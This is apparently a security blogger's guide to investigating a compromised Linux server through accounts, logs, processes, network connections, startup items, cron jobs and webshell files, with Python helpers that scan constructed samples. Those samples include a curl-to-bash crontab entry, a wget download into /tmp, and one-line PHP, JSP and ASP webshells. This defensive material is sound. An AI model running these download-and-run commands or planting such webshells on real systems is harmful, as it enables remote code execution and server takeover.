About the author: CSDN Top 100, Alibaba Cloud blog expert, Huawei Cloud sharing expert, and high-quality creator in the field of network security.
Recently, some readers have asked me: if a server has been attacked by a hacker, do I have to unplug the network cable, or is there another way?
Ideally, if conditions permit, the network cable should be unplugged first to prevent lateral movement.
But in many cases this is not possible, for example on a cloud server, where there is no physical cable to touch.
In fact, unplugging the cable is not the only response to a hacker attack. A hacker is also a human being: as long as he attacks, he will leave clues.
Below, we look at seven directions of analysis, explain the approach for each, reconstruct the attacker's path, and where possible describe countermeasures.
1. Account Analysis
/etc/passwd
This file stores user account information.
A login shell of /bin/bash means the account can log in; /sbin/nologin means the account cannot log in.
/etc/group
This file stores user group information.
1. Check suspicious accounts
Focus on users whose UID is greater than 1000 (newly created users get a UID greater than 1000, while all system users have a UID below 500).
awk -F: '($2=="")' /etc/shadow
Find accounts with an empty password.
awk -F: '($3==0)' /etc/passwd
or grep "0:0" /etc/passwd
Find accounts with UID 0 (superuser privileges); make sure root is the only one.
grep "/bin/bash" /etc/passwd
Find accounts that are able to log in.
2. Login status
who -b
Show the last boot time.
w
View the logged-in users (login time, login IP, and programs being executed).
lastb
View failed login attempts.
lastlog
View the last login information of all users.
last
View recent login information (including system power-on and shutdown).
3. Historical commands
history
View the command history (it is cleared by history -c).
/root/.bash_history
This file saves the command history of the root user.
/home/user001/.bash_history
This file saves the command history of an ordinary user.
history -c only clears the in-memory history shown by the history command; the commands recorded in the .bash_history file remain until that file itself is deleted.
Focus on suspicious commands in the history, such as wget (remote download), ssh (connecting into the intranet), and tar/zip (compressing and packaging data).
If the SSH service has been reinstalled with a backdoor (a built-in account that does not appear in the system), check the modification time of the SSH binaries, or view the version with ssh -V.
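As an added example (not code from the original post), the checks in this section can be scripted: the functions below parse passwd/shadow content and a bash history and flag the same things the awk/grep one-liners above look for. All inputs are constructed samples, not data from a real host.

```python
import re

# Constructed sample /etc/passwd and /etc/shadow contents (not from a real host).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
user001:x:1000:1000::/home/user001:/bin/bash
backdoor:x:0:0::/tmp:/bin/bash
svc_tmp:x:1002:1002::/home/svc_tmp:/bin/bash
"""
SAMPLE_SHADOW = """\
root:$6$salt$hash:19500:0:99999:7:::
bin:*:19500:0:99999:7:::
user001:$6$salt$hash:19500:0:99999:7:::
backdoor::19500:0:99999:7:::
svc_tmp:$6$salt$hash:19500:0:99999:7:::
"""
# Constructed sample ~/.bash_history (198.51.100.7 is a documentation address).
SAMPLE_HISTORY = """\
ls -la
wget http://198.51.100.7/x.sh -O /tmp/x.sh
chmod +x /tmp/x.sh
ssh admin@10.0.0.5
tar czf /tmp/data.tgz /var/www
history -c
"""
# Commands the post singles out, plus "history -c" as an anti-forensics sign.
SUSPICIOUS = re.compile(r"^\s*(wget|curl|ssh|scp|tar|zip|history -c)\b")


def audit_accounts(passwd_text, shadow_text):
    """Same checks as the one-liners: UID 0 that is not root,
    login-capable users with UID >= 1000, and empty password fields."""
    findings = []
    for line in passwd_text.splitlines():
        name, _pw, uid, _gid, _gecos, _home, shell = line.split(":")
        if int(uid) == 0 and name != "root":
            findings.append(("uid0_not_root", name))
        if int(uid) >= 1000 and shell == "/bin/bash":
            findings.append(("login_user", name))
    for line in shadow_text.splitlines():
        name, pw = line.split(":")[:2]
        if pw == "":  # awk -F: '($2=="")' /etc/shadow
            findings.append(("empty_password", name))
    return findings

def suspicious_history(history_text):
    """Return history lines matching the commands worth a closer look."""
    return [l for l in history_text.splitlines() if SUSPICIOUS.match(l)]
```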
2. Log Analysis
Linux system logs are stored by default under /var/log/.
- /var/log/cron Scheduled task (cron) log.
- /var/log/dmesg Boot-time kernel message log (viewed with the dmesg command).
- /var/log/maillog Mail log.
- /var/log/messages General system log (when there is a problem with the system, check this log first).
- /var/log/secure Authentication log: application login information and the credentials entered.
grep "Accepted" /var/log/secure
Filter the log for successful logins.
grep "Failed" /var/log/secure
Filter the log for failed logins.
/var/log/apache2/access.log
Apache access log.
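As an added example (not code from the original post), the two grep commands above can be combined into one pass over /var/log/secure that counts failures per source IP and lists which accounts each IP eventually logged into; the log lines are constructed samples in the secure-log format.

```python
import re
from collections import defaultdict

# Constructed sample lines in /var/log/secure format; 203.0.113.9 and
# 192.168.31.10 are documentation/private addresses, not real attackers.
SAMPLE_SECURE = """\
Jun  3 10:15:01 web1 sshd[1234]: Failed password for root from 203.0.113.9 port 51234 ssh2
Jun  3 10:15:03 web1 sshd[1235]: Failed password for invalid user admin from 203.0.113.9 port 51236 ssh2
Jun  3 10:15:05 web1 sshd[1237]: Failed password for root from 203.0.113.9 port 51240 ssh2
Jun  3 10:15:09 web1 sshd[1240]: Accepted password for root from 203.0.113.9 port 51250 ssh2
Jun  3 11:02:44 web1 sshd[1300]: Accepted publickey for user001 from 192.168.31.10 port 40000 ssh2
Jun  3 11:05:00 web1 sudo: user001 : TTY=pts/0 ; PWD=/home/user001 ; USER=root ; COMMAND=/bin/bash
"""
# Matches both the "Accepted" and the "Failed" lines that grep would find.
SSH_LINE = re.compile(
    r"sshd\[\d+\]: (?P<result>Accepted|Failed) (?P<method>\w+) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def summarize_logins(log_text):
    """Per source IP: number of failures and the accounts it logged into."""
    stats = defaultdict(lambda: {"failed": 0, "accepted": []})
    for line in log_text.splitlines():
        m = SSH_LINE.search(line)
        if not m:
            continue  # sudo and other non-sshd lines are skipped here
        entry = stats[m["ip"]]
        if m["result"] == "Failed":
            entry["failed"] += 1
        else:
            entry["accepted"].append((m["user"], m["method"]))
    return dict(stats)


def likely_bruteforce(stats, min_failures=3):
    """IPs that failed at least min_failures times and then got in:
    the password-guessing pattern worth blocking first."""
    return sorted(ip for ip, e in stats.items()
                  if e["failed"] >= min_failures and e["accepted"])
```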
3. Process Analysis
Focus on processes that restart after being killed, and trace how they are restarted by following the startup-item steps (section 5).
1. Check the process
ps -ef
View all processes.
ps -aux
View all processes together with their CPU and memory usage.
top
Look for processes with unusually high CPU usage (over 80%); they may be cryptocurrency miners, or simply a business peak.
kill -9 PID
End a process by PID.
2. View the process execution file
lsof -p 1546
List the files opened by the process with PID 1546; the third line is the executable corresponding to the process.
ll /proc/1546/exe
View the executable corresponding to the process with PID 1546.
lsof -i:22
View the process corresponding to port 22.
4. Network connection
Check for suspicious network connections. Submit suspicious IPs, domain names and files to a threat intelligence platform for analysis.
1. View the status of network connections
netstat -anopt
Check the network connection status: LISTEN means the socket is listening (waiting for a connection); ESTABLISHED means an open connection.
If the malicious IP is already known, filter for the connections communicating with it: netstat -anopt | grep 192.168.31.28
If only the malicious domain name is known, edit /etc/hosts to resolve that domain name to some other IP of your choice, and then filter for the network connections communicating with that IP.
2. Threat intelligence analysis
A threat intelligence platform can query the reputation of domain names, IPs and files; if there are traces of attack activity, block them immediately.
Qi Anxin Threat Intelligence: https://ti.qianxin.com/
Weibu Online: https://x.threatbook.com/
VirusTotal: https://www.virustotal.com/gui/home/upload
Anheng Threat Intelligence: https://ti.dbappsecurity.com.cn/
Sangfor Threat Intelligence: https://ti.sangfor.com.cn/analysis-platform
VenusEye Threat Intelligence: https://www.venuseye.com.cn/
360 Threat Intelligence: https://ti.360.net/#/homepage
5. Startup items
To avoid losing contact with the controlled machine, many malicious programs add themselves to the startup items.
1. Boot file
Check whether there are any abnormal self-starting files, and pay attention to whether the content of existing files has been tampered with or had malicious instructions inserted.
1) /etc/rc.local
Commands added at the end of this script are executed during boot.
/etc/rc.local is a soft link to /etc/rc.d/rc.local; the two paths have the same effect.
2) /etc/init.d/
This directory holds the startup scripts of many system services, which are executed after the system has finished booting.
/etc/init.d/ is a soft link to /etc/rc.d/init.d/; the two paths have the same effect.
Ubuntu does not have the /etc/rc.d/init.d directory. To keep the same service layout on CentOS and Ubuntu, all service scripts are placed in the /etc/init.d directory.
3) /etc/rc*.d
Check whether the service startup scripts in the other startup directories have been tampered with.
2. Boot command
systemctl list-unit-files
View the startup status of all services: enabled means the service starts automatically at boot; disabled means it does not.
systemctl list-unit-files | grep firewalld
Check whether the specified service starts automatically at boot.
systemctl stop firewalld.service
Stop the service.
systemctl disable firewalld.service
Disable auto-start at boot.
3. Environment variable configuration file
These files configure environment variables and start programs; they are executed when a user logs in (including at startup) or switches users.
- /etc/bashrc
- /etc/profile
- ~/.bashrc
- ~/.bash_profile
6. Planning tasks
crontab -l
View scheduled tasks for the current user.
crontab -l -u root
View scheduled tasks for a specified user.
/etc/crontab
Stores the system-wide scheduled tasks.
/etc/anacrontab
Stores asynchronous (anacron) scheduled tasks.
/var/spool/cron/
This directory stores the scheduled tasks of each user.
/etc/cron.d
This directory stores additional scheduled task files to be executed.
/etc/cron.hourly/
Tasks executed hourly.
/etc/cron.daily/
Tasks executed daily.
/etc/cron.weekly/
Tasks executed weekly.
/etc/cron.monthly/
Tasks executed monthly.
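As an added example covering both the startup items in section 5 and the scheduled tasks here (not code from the original post), the function below reads crontab and rc.local style content and flags entries with traits that rarely appear in legitimate persistence: piping a download into a shell, running from /tmp or /dev/shm, hidden paths, and base64-decoded commands. The sample contents are constructed.

```python
import re

# Constructed sample crontab and rc.local contents (not from a real host).
SAMPLE_CRONTAB = """\
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
# run-parts
01 * * * * root run-parts /etc/cron.hourly
*/5 * * * * root curl -fsSL http://198.51.100.7/a.sh | bash
0 3 * * * root /usr/bin/certbot renew --quiet
* * * * * nobody /dev/shm/.x/kworker >/dev/null 2>&1
"""
SAMPLE_RC_LOCAL = """\
#!/bin/bash
touch /var/lock/subsys/local
nohup /tmp/.svc/run.sh &
"""
# Traits that rarely appear in legitimate cron or rc.local entries.
INDICATORS = [
    ("download_and_run", re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")),
    ("runs_from_tmp", re.compile(r"(^|\s)/(tmp|dev/shm|var/tmp)/")),
    ("hidden_path", re.compile(r"/\.[^/\s]+")),
    ("encoded_command", re.compile(r"base64\s+(-d|--decode)")),
]


def cron_command(line):
    """Strip the five time fields and the user field of a system crontab line."""
    parts = line.split(None, 6)
    return parts[6] if len(parts) == 7 else line


def audit_persistence(text, system_crontab=True):
    """Return (line, [indicator names]) for entries that look suspicious.
    Use system_crontab=False for rc.local or a user crontab without a user field."""
    hits = []
    for line in text.splitlines():
        s = line.strip()
        if not s or s.startswith("#") or re.match(r"^[A-Z_]+=", s):
            continue  # comments and variable assignments
        cmd = cron_command(s) if system_crontab else s
        names = [n for n, rx in INDICATORS if rx.search(cmd)]
        if names:
            hits.append((s, names))
    return hits
```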
7. Sensitive directory files
Webshells usually contain malicious functions, such as:
- PHP: eval(), system(), assert()
- JSP: getRuntime(), FileOutputStream()
- ASP: eval(), execute(), ExecuteGlobal()
Look for suspicious files and check for such malicious functions in the file to determine if it is a webshell.
1. Recently modified files
find /root/ -ctime -2
Find files in the /root/ directory whose status changed (for example, newly created files) within the last two days.
find /root/ -mtime -2
Find files in the /root/ directory whose content was modified within the last two days.
stat text.txt
View the detailed information of a file, focusing on the access/modify/change times.
ls -alt
List files sorted by modification time, newest first.
2. Sensitive directory
/tmp/ Temporary directory; ordinary users have read and write permission on the files in it, so it is commonly used to stage privilege escalation.
/usr/bin/
/usr/sbin/
/etc/ssh/
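As an added example (not code from the original post), the file checks in this section can be combined: the helpers below look for the per-language function names listed above, apply the find -mtime/-ctime style age test, and walk a web root to report matching files. The sample file contents are constructed; scan_tree is for use on a real directory.

```python
import os
import re
import time

# Function names the post lists per language; case-insensitive because
# Java writes getRuntime() and ASP is not case-sensitive.
WEBSHELL_SIGS = {
    ".php": re.compile(r"\b(eval|system|assert)\s*\(", re.I),
    ".jsp": re.compile(r"\b(getRuntime|FileOutputStream)\s*\(", re.I),
    ".asp": re.compile(r"\b(eval|execute|ExecuteGlobal)\s*\(", re.I),
}
# Constructed sample file contents (paths and code are made up for the checks).
SAMPLE_FILES = {
    "/var/www/html/upload/x.php": '<?php @eval($_POST["c"]); ?>',
    "/var/www/html/index.php": '<?php echo "hello"; ?>',
    "/var/www/html/cmd.jsp": '<% Runtime.getRuntime().exec(request.getParameter("c")); %>',
    "/var/www/html/old.asp": '<% Execute(Request("c")) %>',
    "/var/www/html/logo.png": "\x89PNG...",
}


def webshell_indicators(path, content):
    """Names of the dangerous functions found in one file (empty if none)."""
    rx = WEBSHELL_SIGS.get(os.path.splitext(path)[1].lower())
    return sorted({m.lower() for m in rx.findall(content)}) if rx else []


def recently_changed(mtime, ctime, days=2, now=None):
    """Equivalent of find -mtime -N -o -ctime -N for one file's timestamps."""
    now = time.time() if now is None else now
    return max(mtime, ctime) > now - days * 86400


def scan_tree(root, days=2):
    """Walk a web root and report (path, functions, changed_recently) for
    every file that contains webshell-style function calls."""
    report = []
    for d, _dirs, files in os.walk(root):
        for f in files:
            p = os.path.join(d, f)
            try:
                with open(p, encoding="utf-8", errors="ignore") as fh:
                    hits = webshell_indicators(p, fh.read())
            except OSError:
                continue
            if hits:
                st = os.stat(p)
                report.append((p, hits, recently_changed(st.st_mtime, st.st_ctime, days)))
    return report
```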
Summary:
The emergency response approach can be roughly divided into three parts:
- Find the webshell.
- Determine the attacking IP.
- Retrace the attacker's operations and reconstruct the attack process.